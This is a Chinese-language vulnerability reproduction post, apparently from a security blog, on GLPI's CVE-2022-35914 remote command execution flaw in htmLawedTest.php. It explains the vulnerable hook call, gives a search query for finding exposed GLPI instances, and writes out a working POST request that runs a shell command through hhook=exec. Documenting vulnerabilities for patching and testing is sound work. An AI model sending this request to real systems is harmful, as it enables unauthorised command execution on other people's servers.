GLPI htmLawedTest.php 远程命令执行漏洞 #CVE-2022-35914

漏洞描述

GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,你可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。GLPI 10.0.2及之前版本存在安全漏洞,该漏洞源于htmlawed 模块中 允许 PHP 代码注入。

漏洞影响

GLPI

网络测绘

title=”GLPI”

漏洞复现

登录页面

20240402111817146-png

出现问题的文件为 htmLawedTest.php, 来源于第三方库 PHP Labware

20240402111844480-png (1)

https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/

在 htmLawedTest.php 中接收参数并传入方法 htmLawed 中

20240402111930783-png (2)

跟进文件 htmLawed.php 中

20240402112008801-png (3)

if($C['hook']){$t = $C['hook']($t, $C, $S);}

这里可以看到参数均为用户可控参数,当控制参数 hhook 为 exec 和 text 为执行的命令时就导致了命令执行漏洞

20240402112106235-png (4)

验证POC

/vendor/htmlawed/htmlawed/htmLawedTest.php

20240402112556979-png (5)

20240402113309607-png (6)

访问页面获取到 sid 与 token 后再发送请求包

POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 88
Content-Type: application/x-www-form-urlencoded

token=a79cf121bde57fe0e3cc0f247f77961a&text=id&hhook=exec&sid=h1c0vk004dvulal5nj8i6en44e

20240402113401972-png (7)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容